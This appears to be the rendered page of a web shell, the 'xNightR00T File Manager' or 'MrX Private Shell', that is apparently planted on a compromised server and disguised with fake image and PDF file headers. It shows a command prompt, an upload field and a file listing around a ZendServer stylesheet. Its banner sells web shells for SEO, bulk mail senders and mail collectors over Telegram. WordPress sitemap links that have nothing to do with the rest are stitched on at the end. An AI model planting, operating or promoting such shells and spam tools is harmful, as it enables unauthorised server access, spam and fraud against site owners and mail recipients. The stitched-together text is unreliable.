xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
@CHARSET "UTF-8";
/*
html {
	overflow: hidden;
}
*/
#issue-details-events-list {
    width: 250px;
    display:inline-block;
    height: calc(100% - 46px);
    margin-top: 15px;
}

#issue-details-content-wrapper {
    width: calc(100% - 255px);
    display:inline-block;
    height: 100%;
    position: relative;
    vertical-align: top;
    overflow: hidden;
}

#issue-details-content-wrapper .mui-leaf {
    line-height: 22px;
    white-space: nowrap;
}

#issue-details-content-wrapper .mui-leaf-image {
    background: url("/ZendServer/images/leaf.gif") no-repeat scroll 0 0 transparent
}

#issue-details-content>div {
	position: relative;
	height: calc(100% - 15px);
}
#issue-details-content {
    width: 100%;
    overflow: auto;
    border-right: 1px solid #DDD;
    height: calc(100% - 81px);
    vertical-align: top;
}

#issue-details-content:not(.new) > div {
    display: none;
    overflow: auto;
}

#issue-details-content .errorMsg {
    display: block;
    padding: 10px;
}

#backtrace-showfile {
    padding: 3px;
    border-top: 1px solid #EDEDED;
    height: 70%;
}

#mui-source-file td {
    padding: 0 5px;
}

#mui-source-file code {
    font-family: monospace;
    font-size: 11px;
    line-height: 18px;
}


.event-bottom-actions {
    position: absolute;
    bottom: 0;
    right: -2px;
    background: #EDEDED;
    color: #000;
    left: 0;
}
.event-bottom-actions:not(.new) {
    left: 460px;
	position:fixed;
}
#event-studio-actions-bar button:first-child {
    margin-left: 10px;
}

.jobqueue_event_properties li strong {
    margin-right: 8px;
}

#backtrace-container {
    overflow: auto;
    height: 30%;
}

#backtrace-backtrace {
    color: #808080;
}

.backtrace-panels {
    padding: 3px;
    margin: 0;
}

.debugSettingsTipWrapper label {
    font-weight: normal;
    margin-left: 8px;
}

.debugSettingsTipWrapper button {
    float: right;
}

.debugSettingsTipWrapper {
    width: 290px;
}

.debugSettingsTipWrapper table {
    margin-bottom: 0px;
}

.debugSettingsTipWrapper table td {
    padding: 5px 10px;
}
/*
.bar {
	background: none repeat scroll 0 0 #E2EFF5;
	color: #3E5C67;
	font-size: 13px;
	font-weight: normal;
	width: 290px;
	text-align: right;
}

.bar span {
	padding-right: 5px;
	cursor: pointer;
}*/

.debugSettingsTipWrapper {
    background-color: #fff;
    border: 1px solid #a3bcc7;
    word-wrap: break-word;
    /* padding: 5px 15px; */
    color: #000;
    padding: 0px;
    font-weight: bold;
    font-size: 11px;
    -moz-border-radius: 3px;
    -webkit-border-radius: 3px;
    border-radius: 3px;
    margin-top: 0px !important;
}

div.code {
    font-family: Courier New
}

#event-details-backtrace {
    height: 100%;
}

.issue-details .count-icon.warning {
    background: #FCB320;
}

.issue-details .count-icon.critical {
    background: #ED4E29;
}

.issue-details .count-icon.info {
    background: #51aac2;
}
.issue-details .json-block pre{
	margin:0;
}
.issue-details .json-block{
    background: #f8f8f8;
    display: inline-block;
    padding: 10px;
    border-radius: 3px;
    margin: 5px 0;
    position: relative;
    max-width: 95%;
    padding-right: 40px;
}
.issue-details .json-block a.copy-to-clipboard {
    color: gray;
    border: 1px solid #e0e0e0;
    border-radius: 2px;
    padding: 2px 6px;
    position: absolute;
    right: 5px;
    top: 5px;
    opacity:0.3;
    transition: opacity 0.3s;
    background: white;
}
.issue-details .json-block:hover a.copy-to-clipboard {
	opacity:1;
}
#action-buttons-bar {
    margin-top: 14px;
}

.action-text-buttons {
    border-bottom: 1px solid #E3E3E3;
}

.count-icon {
    background: #808F96;
}
#issue-details-wrapper {
    height: calc(100% - 135px);
}

.issue-details {
    height: calc(100% - 45px);
}

Filemanager

Name Type Size Permission Actions
devbar Folder 0755
admin.css File 10.21 KB 0644
appList.css File 3.72 KB 0644
azure.css File 89 B 0644
bootstrap.css File 3.09 KB 0644
charts.css File 267 B 0644
codetracing.css File 11.04 KB 0644
configImport.css File 277 B 0644
configuration.css File 4.1 KB 0644
dashboard.css File 19 B 0644
datepicker_dashboard.css File 5.42 KB 0644
dcpulse.css File 7.75 KB 0644
devbar-azure.css File 3.04 KB 0644
devbar-embedded.css File 28.83 KB 0644
devbar-iframe.css File 4.09 KB 0644
devbar-zray-standalone.css File 1.56 KB 0644
devbar.css File 150.63 KB 0644
error.css File 936 B 0644
events.css File 244 B 0644
expired.css File 6.84 KB 0644
filter.css File 7.95 KB 0644
glyphicons.css File 45.76 KB 0644
guidePageZrayStandalone.css File 1.26 KB 0644
guidepage.css File 16.6 KB 0644
history.css File 6.39 KB 0644
icons.css File 1.12 KB 0644
ipwidget.css File 98 B 0644
issueDetails.css File 3.65 KB 0644
jobqueue_settings.css File 448 B 0644
jobs.css File 1.53 KB 0644
jqpulse.css File 13.77 KB 0644
layout.css File 12.83 KB 0644
libsList.css File 508 B 0644
license.css File 2.48 KB 0644
login.css File 5.09 KB 0644
logs.css File 6.97 KB 0644
monitor-rules.css File 1.37 KB 0644
monitor-settings.css File 1013 B 0644
monitorRule.css File 6.43 KB 0644
pageCache.css File 4.47 KB 0644
plugins.css File 13.78 KB 0644
prereq.css File 519 B 0644
recurringJob.css File 2.43 KB 0644
rulesList.css File 1.14 KB 0644
serverInfo.css File 1.49 KB 0644
servers.css File 607 B 0644
sessionClustering.css File 704 B 0644
simplemodal.css File 975 B 0644
spinner-input.css File 765 B 0644
spinner.css File 1.3 KB 0644
studio.css File 17.42 KB 0644
style.css File 82.54 KB 0644
tags.css File 477 B 0644
toast.css File 1.84 KB 0644
ui-grid-zs.css File 5.07 KB 0644
uploader.css File 1.78 KB 0644
urlinsight.css File 16.69 KB 0644
urlinsightRules.css File 357 B 0644
vhosts.css File 7.26 KB 0644
webApi.css File 251 B 0644
wizard.css File 15.21 KB 0644
z-ray-libs.css File 210.67 KB 0644
z-ray-libs.min.css File 187.41 KB 0644
zgrid.css File 13.86 KB 0644
zmenu.css File 763 B 0644
zray-standalone.css File 810 B 0644
zs-reset.css File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml